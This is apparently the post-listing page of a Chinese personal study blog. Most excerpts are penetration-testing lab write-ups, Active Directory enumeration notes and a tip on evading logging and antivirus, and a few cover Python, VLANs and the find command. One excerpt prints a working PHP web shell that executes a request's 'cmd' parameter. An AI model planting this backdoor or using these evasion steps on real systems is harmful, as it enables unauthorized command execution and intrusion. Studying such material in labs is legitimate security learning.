zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
Python数据容器概念-白鸢的笔记

Python数据容器概念

1.Python数据容器概念Python中的数据容器:一种可以容纳多份数据的数据类型,容纳的每一份数据称之为1个元素每一个元素,可以是任意类型的数据,如字符串、数字、布尔等。  2.数据容器的分类...
2年前
0486
Active Directory - 自动枚举-白鸢的笔记

Active Directory – 自动枚举

我们的手动枚举可能相对耗时,并且会生成大量难以组织的信息。尽管了解手动枚举的概念很重要,但我们也可以利用自动化工具来加快枚举过程并快速揭示可能的攻击路径,尤其是在大型环境中。手动和...
1年前
0786
Objective 3-白鸢的笔记

Objective 3

任务枚举以下内容在dollarcorp domain:域管理员组的ACL所有改变的studentx的权限 运行 invishell 脚本以避免增强日志记录 否则导入PowerView.ps1会被av拦截C:\AD\Tools\InviShell\RunWithRegis...
8个月前
0776
Flimsy-白鸢的笔记

Flimsy

简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE No more flimsy excuses 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.200.220   Linux 1. 信息收集收集受...
Mercy V2 knock过滤端口解决 Tomcat用户名密码文件-白鸢的笔记

Mercy V2 knock过滤端口解决 Tomcat用户名密码文件

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.175 Linux 1. 信息收集80端口被过滤掉了看起来是tomcat base64解码大致意思是有个人的密码是password 访问smb服务这个看起来既是...
11个月前
0726
VLAN原理和VLAN间路由2 配置Access-白鸢的笔记

VLAN原理和VLAN间路由2 配置Access

1. VLAN配置[SW1]vlan 10 [SW1-vlan10]q [SW1]vlan batch 2 to 3 Info: This operation may take a few seconds. Please wait for a moment...done. [SW1] Jul 19 2023 00:33:56-08:00 SW1 DS/4...
2年前
0576
文件查找 find命令-白鸢的笔记

文件查找 find命令

find命令find是实时查找工具,通过遍历指定路径完成文件查找工作特点:·查找速度略慢·精确查找·实时查找·查找条件丰富·可能只搜索用户具备读取和执行权限的目录格式:find [OPTION]... [查...
简单php木马-白鸢的笔记

简单php木马

simple-backdoor.php<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; } ?>使用方法:Usage: http://target...
11个月前
0686
Running as in Windows-白鸢的笔记

Running as in Windows

如果您以低权限用户的身份运行,并且拥有管理员凭证(用户名和密码),那么您可以使用这些凭证升级您的权限。最实际的方法是首先复制反向shell(例如,netcat或使用MSFvenom生成的shell)。之后...
Mango NoSql注入与爆破 jjs权限提升-白鸢的笔记

Mango NoSql注入与爆破 jjs权限提升

实验环境攻击者 Kali 10.10.16.5受害者 IP 10.10.10.162 Linux 1. 信息收集22,80,443端口开启root@kali# nmap -p 22,80,443 -sC -sV -oA scans/nmap-tcpscripts 10.10.10.162 Starting Nmap 7....
8个月前
0546